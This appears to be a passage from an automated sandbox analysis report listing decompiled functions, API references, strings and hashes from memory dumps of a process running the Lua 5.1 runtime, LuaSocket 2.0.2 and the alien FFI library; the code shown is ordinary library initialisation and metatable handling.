Part of subcall function 00A231A0: lua_settable.LUA5.1(?,000000FD,?,00A21310,00000001,?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23219
Part of subcall function 00A231A0: lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A21310,00000001,?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23221

Part of subcall function 00A23230: luaL_newmetatable.LUA5.1(?,alien_callback,00A23E6F), ref: 00A23236
Part of subcall function 00A23230: lua_pushlstring.LUA5.1(?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A23243
Part of subcall function 00A23230: lua_createtable.LUA5.1(?,00000000,00000000,?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A2324D
Part of subcall function 00A23230: lua_pushlstring.LUA5.1(?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A2325A
Part of subcall function 00A23230: lua_pushcclosure.LUA5.1(?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A23267
Part of subcall function 00A23230: lua_settable.LUA5.1(?,000000FD,?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_callback), ref: 00A2326F
Part of subcall function 00A23230: lua_settable.LUA5.1(?,000000FD), ref: 00A2327A
Part of subcall function 00A23230: lua_pushlstring.LUA5.1(?,__call,00000006,?,000000FD), ref: 00A23287
Part of subcall function 00A23230: lua_pushcclosure.LUA5.1(?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23294
Part of subcall function 00A23230: lua_settable.LUA5.1(?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A2329C
Part of subcall function 00A23230: lua_pushlstring.LUA5.1(?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A232A9
Part of subcall function 00A23230: lua_pushcclosure.LUA5.1(?,00A229E0,00000000,?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A232B6
Part of subcall function 00A23230: lua_settable.LUA5.1(?,000000FD), ref: 00A232C1
Part of subcall function 00A23230: lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD), ref: 00A232CE
Part of subcall function 00A23230: lua_pushcclosure.LUA5.1(?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A232DB
Part of subcall function 00A23230: lua_settable.LUA5.1(?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A232E3
Part of subcall function 00A23230: lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A232EB

Part of subcall function 00A23300: luaL_newmetatable.LUA5.1(?,alien_function,00A23E74), ref: 00A23306
Part of subcall function 00A23300: lua_pushlstring.LUA5.1(?,__index,00000007,?,alien_function,00A23E74), ref: 00A23313
Part of subcall function 00A23300: lua_createtable.LUA5.1(?,00000000,00000000,?,__index,00000007,?,alien_function,00A23E74), ref: 00A2331D
Part of subcall function 00A23300: lua_pushlstring.LUA5.1(?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_function,00A23E74), ref: 00A2332A
Part of subcall function 00A23300: lua_pushcclosure.LUA5.1(?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_function,00A23E74), ref: 00A23337
Part of subcall function 00A23300: lua_settable.LUA5.1(?,000000FD,?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_function), ref: 00A2333F
Part of subcall function 00A23300: lua_settable.LUA5.1(?,000000FD), ref: 00A2334A
Part of subcall function 00A23300: lua_pushlstring.LUA5.1(?,__call,00000006,?,000000FD), ref: 00A23357
Part of subcall function 00A23300: lua_pushcclosure.LUA5.1(?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23364
Part of subcall function 00A23300: lua_settable.LUA5.1(?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A2336C
Part of subcall function 00A23300: lua_pushlstring.LUA5.1(?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23379
Part of subcall function 00A23300: lua_pushcclosure.LUA5.1(?,00A22970,00000000,?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23386
Part of subcall function 00A23300: lua_settable.LUA5.1(?,000000FD), ref: 00A23391
Part of subcall function 00A23300: lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD), ref: 00A2339E
Part of subcall function 00A23300: lua_pushcclosure.LUA5.1(?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A233AB
Part of subcall function 00A23300: lua_settable.LUA5.1(?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A233B3
Part of subcall function 00A23300: lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A233BB

Part of subcall function 00A23DD0: luaL_newmetatable.LUA5.1(?,alien_buffer,00A23E79), ref: 00A23DD6
Part of subcall function 00A23DD0: lua_pushlstring.LUA5.1(?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23DE3
Part of subcall function 00A23DD0: lua_pushcclosure.LUA5.1(?,00A23B40,00000000,?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23DF0
Part of subcall function 00A23DD0: lua_settable.LUA5.1(?,000000FD,?,00A23B40,00000000,?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23DF8
Part of subcall function 00A23DD0: lua_pushlstring.LUA5.1(?,__newindex,0000000A,?,000000FD,?,00A23B40,00000000,?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23E05
Part of subcall function 00A23DD0: lua_pushcclosure.LUA5.1(?,00A22F20,00000000,?,__newindex,0000000A,?,000000FD,?,00A23B40,00000000,?,__index,00000007,?,alien_buffer), ref: 00A23E12
Part of subcall function 00A23DD0: lua_settable.LUA5.1(?,000000FD), ref: 00A23E1D
Part of subcall function 00A23DD0: lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD), ref: 00A23E2A
Part of subcall function 00A23DD0: lua_pushcclosure.LUA5.1(?,00A22DE0,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A23E37
Part of subcall function 00A23DD0: lua_settable.LUA5.1(?,000000FD,?,00A22DE0,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A23E3F
Part of subcall function 00A23DD0: lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A22DE0,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A23E47

lua_getfield.LUA5.1(?,FFFFD8EE,alien), ref: 00A23E84
lua_type.LUA5.1(?,000000FF,?,FFFFD8EE,alien), ref: 00A23E8C
lua_createtable.LUA5.1(?,00000000,00000000), ref: 00A23E9B
lua_pushvalue.LUA5.1(?,000000FF,?,00000000,00000000), ref: 00A23EA3
lua_setfield.LUA5.1(?,FFFFD8EE,alien,?,000000FF,?,00000000,00000000), ref: 00A23EB3
lua_createtable.LUA5.1(?,00000000,00000000), ref: 00A23EC0
lua_pushvalue.LUA5.1(?,000000FF,?,00000000,00000000), ref: 00A23EC8
lua_setfield.LUA5.1(?,000000FD,core,?,000000FF,?,00000000,00000000), ref: 00A23ED5

Strings

core, xrefs: 00A23ECD
alien, xrefs: 00A23E79, 00A23EA8

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushlstring.lua_settable.$lua_pushcclosure.$lua_createtable.$L_newmetatable.lua_settop.$lua_pushvalue.lua_setfield.$lua_getfield.lua_type.
String ID: alien$core
API String ID: 3875307983-1034162407
Opcode ID: 5ac2d7858bc6a2e9b7e33435d24e0f36787d2d6d4c17847efd209c9fe0e52a46
Instruction ID: 7ea4f61f7f0b65a51c072d9e7bc9d74c8836a2b3ac97183a192374f5e0c27569
Opcode Fuzzy Hash: 5ac2d7858bc6a2e9b7e33435d24e0f36787d2d6d4c17847efd209c9fe0e52a46
Instruction Fuzzy Hash: F5F0F463E1E93231DC1232AD3F43E9F24191F17B20F200770B920781D2AE9D5B0200AA

Uniqueness

Uniqueness Score: -1.00%

Function 009934D0, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E009934D0(signed int __eax, intOrPtr _a4) {
				signed int _t4;
				signed int _t5;
				intOrPtr _t6;
				void* _t7;
				void* _t8;

				_t6 = _a4;
				_push("getfd");
				_push(_t6);
				_t5 = _t4 | 0xffffffff;
				L00994AD0();
				_push(0xfffffffe);
				_push(_t6);
				L00994B00();
				_push(0xffffffff);
				_push(_t6);
				L00994AFA();
				_t8 = _t7 + 0x18;
				if(__eax != 0) {
					_push(0xfffffffe);
					_push(_t6);
					L00994B90();
					_push(1);
					_push(1);
					_push(_t6);
					L00994BC0();
					_push(0xffffffff);
					_push(_t6);
					L00994B84();
					_t8 = _t8 + 0x1c;
					if(__eax != 0) {
						_push(0xffffffff);
						_push(_t6);
						L00994B7E();
						_t8 = _t8 + 8;
						L00994BD0();
						_t5 = __eax;
					}
				}
				_push(0xfffffffe);
				_push(_t6);
				L00994AB8();
				return _t5;
			}

0x009934d1
0x009934d6
0x009934db
0x009934dc
0x009934df
0x009934e4
0x009934e6
0x009934e7
0x009934ec
0x009934ee
0x009934ef
0x009934f4
0x009934f9
0x009934fb
0x009934fd
0x009934fe
0x00993503
0x00993505
0x00993507
0x00993508
0x0099350d
0x0099350f
0x00993510
0x00993515
0x0099351a
0x0099351c
0x0099351e
0x0099351f
0x00993524
0x00993527
0x0099352c
0x0099352c
0x0099351a
0x0099352e
0x00993530
0x00993531
0x0099353d

APIs

lua_pushstring.LUA5.1(00993447,getfd,?,?,00993447,?,?,?,?,?,?,?,?,?,?,?), ref: 009934DF
lua_gettable.LUA5.1(00993447,000000FE,00993447,getfd,?,?,00993447,?), ref: 009934E7
lua_type.LUA5.1(00993447,000000FF,00993447,000000FE,00993447,getfd,?,?,00993447,?), ref: 009934EF
lua_pushvalue.LUA5.1(00993447,000000FE,?,?,?,?,00993447,?), ref: 009934FE
lua_call.LUA5.1(00993447,00000001,00000001,00993447,000000FE,?,?,?,?,00993447,?), ref: 00993508
lua_isnumber.LUA5.1(00993447,000000FF,00993447,00000001,00000001,00993447,000000FE,?,?,?,?,00993447,?), ref: 00993510
lua_tonumber.LUA5.1(00993447,000000FF,?,?,?,?,?,?,?,?,?,?,?,00993447,?), ref: 0099351F
_ftol.MSVCRT ref: 00993527
lua_settop.LUA5.1(00993447,000000FE,?,?,?,?,00993447,?), ref: 00993531

Strings

getfd, xrefs: 009934D6

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftollua_call.lua_gettable.lua_isnumber.lua_pushstring.lua_pushvalue.lua_settop.lua_tonumber.lua_type.
String ID: getfd
API String ID: 3711187348-3410555549
Opcode ID: 75d744fc76f2e8c8764bd9279f79ae62046c7c2e979b3464d21f8f37ab036e4a
Instruction ID: 54eb63dd162053e70c822b9b755bbecf2a4edb9cdc09f386a24cb2ad521cc20f
Opcode Fuzzy Hash: 75d744fc76f2e8c8764bd9279f79ae62046c7c2e979b3464d21f8f37ab036e4a
Instruction Fuzzy Hash: 21F0F866A4A535329C12362E2D02FCE214E8EC733AF294350F935B12D6EE45DA1341FB

Uniqueness

Uniqueness Score: -1.00%

Function 100103A0, Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E100103A0(void* __ebx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* __esi;
				void* _t4;
				void* _t11;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t21;

				_t21 = __fp0;
				_t12 = _a4;
				_t11 = E10001410(__eflags, _t12, 2);
				E1000F410(__ebx, __eflags, _t12, 1, 5);
				_t14 = _t13 + 0x14;
				if(_t11 != 0) {
					_t19 = _t11 - 5;
					if(_t11 != 5) {
						E1000F090(__ebx, _t12, _t19, _t12, 2, "nil or table expected");
						_t14 = _t14 + 0xc;
					}
				}
				_t4 = E1000F630(_t19, _t21, _t12, 1, "__metatable");
				_t15 = _t14 + 0xc;
				_t20 = _t4;
				if(_t4 != 0) {
					_push("cannot change a protected metatable");
					_push(_t12);
					E1000F230();
					_t15 = _t15 + 8;
				}
				E10001160(_t12, 2);
				E10001F20(_t20, _t12, 1);
				return 1;
			}

0x100103a0
0x100103a1
0x100103b3
0x100103b5
0x100103ba
0x100103bf
0x100103c1
0x100103c4
0x100103ce
0x100103d3
0x100103d3
0x100103c4
0x100103de
0x100103e3
0x100103e6
0x100103e8
0x100103ea
0x100103ef
0x100103f0
0x100103f5
0x100103f5
0x100103fb
0x10010403
0x10010412

APIs

lua_type.LUA5.1(?,00000002), ref: 100103A9
luaL_checktype.LUA5.1(?,00000001,00000005,?,00000002), ref: 100103B5

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

luaL_argerror.LUA5.1(?,00000002,nil or table expected), ref: 100103CE

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

luaL_getmetafield.LUA5.1(?,00000001,__metatable), ref: 100103DE
luaL_error.LUA5.1(?,cannot change a protected metatable), ref: 100103F0
lua_settop.LUA5.1(?,00000002), ref: 100103FB
lua_setmetatable.LUA5.1(?,00000001,?,00000002), ref: 10010403

Strings

nil or table expected, xrefs: 100103C6
cannot change a protected metatable, xrefs: 100103EA
__metatable, xrefs: 100103D6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.lua_type.$L_argerror.L_checktype.L_getmetafield.lua_getstack.lua_setmetatable.lua_settop.
String ID: __metatable$cannot change a protected metatable$nil or table expected
API String ID: 2902843751-3425582905
Opcode ID: 05f622d526ba2d67b117bac24d7a1de135e323fafd6e6005b008692355a59b9e
Instruction ID: 754cfbedaba4e0a093d7c0455cb7968025041d9d3581588d24030d3a7ac49b8c
Opcode Fuzzy Hash: 05f622d526ba2d67b117bac24d7a1de135e323fafd6e6005b008692355a59b9e
Instruction Fuzzy Hash: 6CF05E6EB5162032F521E1287C07FEF1049CF51BC8F450024FA147A1CBFAE6AAC241A6

Uniqueness

Uniqueness Score: -1.00%

Function 10016700, Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E10016700(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t4;
				void* _t11;
				intOrPtr _t12;
				void* _t13;
				void* _t14;

				_t17 = __eflags;
				_t10 = __ecx;
				_t12 = _a4;
				_t11 = E1000F4A0(__eflags, _t12, 1, 0);
				E10001B90(__ecx, __eflags, _t12, 0xffffd8ef, "preload");
				_t4 = E10001410(_t17, _t12, 0xffffffff);
				_t14 = _t13 + 0x20;
				_t18 = _t4 - 5;
				if(_t4 != 5) {
					_push("\'package.preload\' must be a table");
					_push(_t12);
					E1000F230();
					_t14 = _t14 + 8;
				}
				E10001B90(_t10, _t18, _t12, 0xffffffff, _t11);
				if(E10001410(_t18, _t12, 0xffffffff) == 0) {
					E100019F0(_t12, "\n\tno field package.preload[\'%s\']", _t11);
				}
				return 1;
			}

0x10016700
0x10016700
0x10016701
0x1001671b
0x1001671d
0x10016725
0x1001672a
0x1001672d
0x10016730
0x10016732
0x10016737
0x10016738
0x1001673d
0x1001673d
0x10016744
0x10016756
0x1001675f
0x10016764
0x1001676e

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001670B

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

lua_getfield.LUA5.1(?,FFFFD8EF,preload,?,00000001,00000000), ref: 1001671D

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_type.LUA5.1(?,000000FF,?,FFFFD8EF,preload,?,00000001,00000000), ref: 10016725
luaL_error.LUA5.1(?,'package.preload' must be a table), ref: 10016738

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_getfield.LUA5.1(?,000000FF,00000000), ref: 10016744
lua_type.LUA5.1(?,000000FF,?,000000FF,00000000), ref: 1001674C
lua_pushfstring.LUA5.1(?,no field package.preload['%s'],00000000), ref: 1001675F

Strings

no field package.preload['%s'], xrefs: 10016759
'package.preload' must be a table, xrefs: 10016732
preload, xrefs: 10016710

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getfield.lua_type.$L_checklstring.L_error.L_where.S_newlstr.lua_concat.lua_error.lua_pushfstring.lua_pushvfstring.lua_tolstring.
String ID: no field package.preload['%s']$'package.preload' must be a table$preload
API String ID: 285602727-726884196
Opcode ID: b2ae0e6d10de379de8055ebb00e938c3903877f53b708856b14954f03a945efa
Instruction ID: 6dfb27ce25f05a60b4a299cfebba21553b985cbde0a114c05f3d4f68a9c6649e
Opcode Fuzzy Hash: b2ae0e6d10de379de8055ebb00e938c3903877f53b708856b14954f03a945efa
Instruction Fuzzy Hash: 75F0827981952031E411E1296C42FEF308CCF932F8F150325F524BA2DBAA58F6C240AA

Uniqueness

Uniqueness Score: -1.00%

Function 009931B0, Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E009931B0(intOrPtr _a4) {
				intOrPtr _t6;
				intOrPtr _t7;

				if(E00993F80() == 0) {
					_t6 = _a4;
					_push("unable to initialize library");
					_push(_t6);
					L00994AD0();
					_push(_t6);
					L00994AEE();
					return 0;
				} else {
					_t7 = _a4;
					_push(0);
					_push(0x996510);
					_push("socket");
					_push(_t7);
					L00994B48();
					_push("_VERSION");
					_push(_t7);
					L00994AD0();
					_push("LuaSocket 2.0.2");
					_push(_t7);
					L00994AD0();
					_push(0xfffffffd);
					_push(_t7);
					L00994AC4();
					return 1;
				}
			}

0x009931b8
0x009931f8
0x009931fc
0x00993201
0x00993202
0x00993207
0x00993208
0x00993213
0x009931ba
0x009931ba
0x009931be
0x009931c0
0x009931c5
0x009931ca
0x009931cb
0x009931d0
0x009931d5
0x009931d6
0x009931db
0x009931e0
0x009931e1
0x009931e6
0x009931e8
0x009931e9
0x009931f7
0x009931f7

APIs

Part of subcall function 00993F80: WSAStartup.WSOCK32(00000002), ref: 00993F8D
Part of subcall function 00993F80: WSACleanup.WSOCK32 ref: 00993FA7

luaL_openlib.LUA5.1(?,socket,00996510,00000000,?,0099317B,?), ref: 009931CB
lua_pushstring.LUA5.1(?,_VERSION,?,socket,00996510,00000000,?,0099317B,?), ref: 009931D6
lua_pushstring.LUA5.1(?,LuaSocket 2.0.2,?,_VERSION,?,socket,00996510,00000000,?,0099317B,?), ref: 009931E1
lua_rawset.LUA5.1(?,000000FD,?,LuaSocket 2.0.2,?,_VERSION,?,socket,00996510,00000000,?,0099317B,?), ref: 009931E9
lua_pushstring.LUA5.1(?,unable to initialize library,?,0099317B,?), ref: 00993202
lua_error.LUA5.1(?,?,unable to initialize library,?,0099317B,?), ref: 00993208

Strings

_VERSION, xrefs: 009931D0
unable to initialize library, xrefs: 009931FC
LuaSocket 2.0.2, xrefs: 009931DB
socket, xrefs: 009931C5

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$CleanupL_openlib.Startuplua_error.lua_rawset.
String ID: LuaSocket 2.0.2$_VERSION$socket$unable to initialize library
API String ID: 1465530894-2623299534
Opcode ID: 6456580c0fa895549871f4005340e138a4e5a81b66feefe7f5d73738e3dacd81
Instruction ID: 7678dc7a651d7a8e02d5a9536fb71c875a4b7776eceb1fec540627895ab33def
Opcode Fuzzy Hash: 6456580c0fa895549871f4005340e138a4e5a81b66feefe7f5d73738e3dacd81
Instruction Fuzzy Hash: 57E06D226CB62132DD12722C6C03FCF15084FC2759F060500F405720CAEA4AAB53C2EF

Uniqueness

Uniqueness Score: -1.00%

Function 10014F20, Relevance: 16.7, APIs: 11, Instructions: 189COMMON

Download Yara Rule

APIs

tolower.MSVCRT ref: 10014F28
_isctype.MSVCRT ref: 10014F67
_isctype.MSVCRT ref: 10014F9E
_isctype.MSVCRT ref: 10014FD0
_isctype.MSVCRT ref: 10015002
_isctype.MSVCRT ref: 10015034
_isctype.MSVCRT ref: 10015066
_isctype.MSVCRT ref: 10015098
_isctype.MSVCRT ref: 100150CA
_isctype.MSVCRT ref: 100150FC
_isctype.MSVCRT ref: 10015137

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _isctype$tolower
String ID:
API String ID: 2917967906-0
Opcode ID: 33a480ecd61aafd99846828b3f0959777e20eb29a79ebab451788c4ec53a3af1
Instruction ID: aa93eaf4393d38b7b310d3620d94e1fefa990c4175c183746e02d43b3fc13ea3
Opcode Fuzzy Hash: 33a480ecd61aafd99846828b3f0959777e20eb29a79ebab451788c4ec53a3af1
Instruction Fuzzy Hash: 09618E39608351DFD316CF14DC91A5A33B2FB8A346F2845A8E9954F3A0CB36E885DB91

Uniqueness

Uniqueness Score: -1.00%

Function 009C11E0, Relevance: 16.6, APIs: 11, Instructions: 125COMMON

Download Yara Rule

APIs

luaL_optlstring.LUA5.1(?,00000001,00000000,?), ref: 009C1200
lua_pushnil.LUA5.1(?), ref: 009C1216
lua_pushnil.LUA5.1(?,?), ref: 009C121C
luaL_buffinit.LUA5.1(?,?), ref: 009C123A
luaL_optlstring.LUA5.1(?,00000002,00000000,?), ref: 009C126D
luaL_pushresult.LUA5.1(?,?,00000000,?), ref: 009C1290
lua_tolstring.LUA5.1(?,000000FF,00000000,?,?,00000000,?), ref: 009C1299
lua_pushnil.LUA5.1(?), ref: 009C12A8
lua_pushnil.LUA5.1(?), ref: 009C12B1

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnil.$L_optlstring.$L_buffinit.L_pushresult.lua_tolstring.
String ID:
API String ID: 3302033068-0
Opcode ID: 53722724f195638b8881604f946c04b784e0e6f76c75dc616d07e3c164a2567a
Instruction ID: 8d20db6bc7fd8ae304c8e9f9a691ebe8b8fd1e2b6381ea819c5964213390287b
Opcode Fuzzy Hash: 53722724f195638b8881604f946c04b784e0e6f76c75dc616d07e3c164a2567a
Instruction Fuzzy Hash: 28312A72C082052AD720FB14AC42FFB739DDBD1754F440A2DFE9596143E529A90987B7

Uniqueness

Uniqueness Score: -1.00%

Function 009C1A50, Relevance: 16.6, APIs: 11, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E009C1A50(intOrPtr _a4) {
				char _v524;
				char _v528;
				char _v532;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr _t22;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				char _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t48;

				_t42 = _a4;
				_t17 =  &_v532;
				_t39 = 0;
				_push(_t17);
				_push(0);
				_push(1);
				_push(_t42);
				_v532 = 0;
				L009C212C();
				_t40 = _t17;
				_t44 =  &_v532 + 0x10;
				_t27 = _t40 + _v532;
				if(_t40 != 0) {
					_push( &_v524);
					_push(_t42);
					L009C211A();
					_t45 = _t44 + 8;
					while(_t40 < _t27) {
						_t40 = _t40 + 1;
						_t25 = E009C1B80( *_t40,  &_v528, _t39,  &_v524);
						_t45 = _t45 + 0x10;
						_t39 = _t25;
					}
					_t18 =  &_v532;
					_push(_t18);
					_push(0);
					_push(2);
					_push(_t42);
					L009C212C();
					_t41 = _t18;
					_t46 = _t45 + 0x10;
					if(_t41 != 0) {
						_t28 = _t41 + _v532;
						while(_t41 < _t28) {
							_t41 = _t41 + 1;
							_t22 = E009C1B80( *_t41,  &_v528, _t39,  &_v524);
							_t46 = _t46 + 0x10;
							_t39 = _t22;
						}
						_push( &_v524);
						L009C2108();
						_push(_t39);
						_push( &_v528);
						_push(_t42);
						L009C2138();
						return 2;
					} else {
						_push( &_v524);
						L009C2108();
						_push(_t41);
						_push(0xffffffff);
						_push(_t42);
						L009C213E();
						_t48 = _t46 + 0x10;
						if( *_t18 == 0) {
							_push(_t42);
							L009C2120();
							_t48 = _t48 + 4;
						}
						_push(_t42);
						L009C2120();
						return 2;
					}
				} else {
					_push(_t42);
					L009C2120();
					_push(_t42);
					L009C2120();
					return 2;
				}
			}

0x009c1a58
0x009c1a61
0x009c1a65
0x009c1a67
0x009c1a68
0x009c1a69
0x009c1a6b
0x009c1a6c
0x009c1a70
0x009c1a79
0x009c1a7b
0x009c1a80
0x009c1a83
0x009c1aa8
0x009c1aa9
0x009c1aaa
0x009c1aaf
0x009c1ab4
0x009c1ac4
0x009c1ac5
0x009c1aca
0x009c1acf
0x009c1acf
0x009c1ad3
0x009c1ad7
0x009c1ad8
0x009c1ada
0x009c1adc
0x009c1add
0x009c1ae2
0x009c1ae4
0x009c1ae9
0x009c1b2d
0x009c1b32
0x009c1b42
0x009c1b43
0x009c1b48
0x009c1b4d
0x009c1b4d
0x009c1b55
0x009c1b56
0x009c1b5f
0x009c1b60
0x009c1b61
0x009c1b62
0x009c1b79
0x009c1aeb
0x009c1aef
0x009c1af0
0x009c1af5
0x009c1af6
0x009c1af8
0x009c1af9
0x009c1b00
0x009c1b05
0x009c1b07
0x009c1b08
0x009c1b0d
0x009c1b0d
0x009c1b10
0x009c1b11
0x009c1b28
0x009c1b28
0x009c1a85
0x009c1a85
0x009c1a86
0x009c1a8b
0x009c1a8c
0x009c1aa3
0x009c1aa3

APIs

luaL_optlstring.LUA5.1(?,00000001,00000000,?), ref: 009C1A70
lua_pushnil.LUA5.1(?), ref: 009C1A86
lua_pushnil.LUA5.1(?,?), ref: 009C1A8C
luaL_buffinit.LUA5.1(?,?), ref: 009C1AAA
luaL_optlstring.LUA5.1(?,00000002,00000000,?), ref: 009C1ADD
luaL_pushresult.LUA5.1(?), ref: 009C1AF0
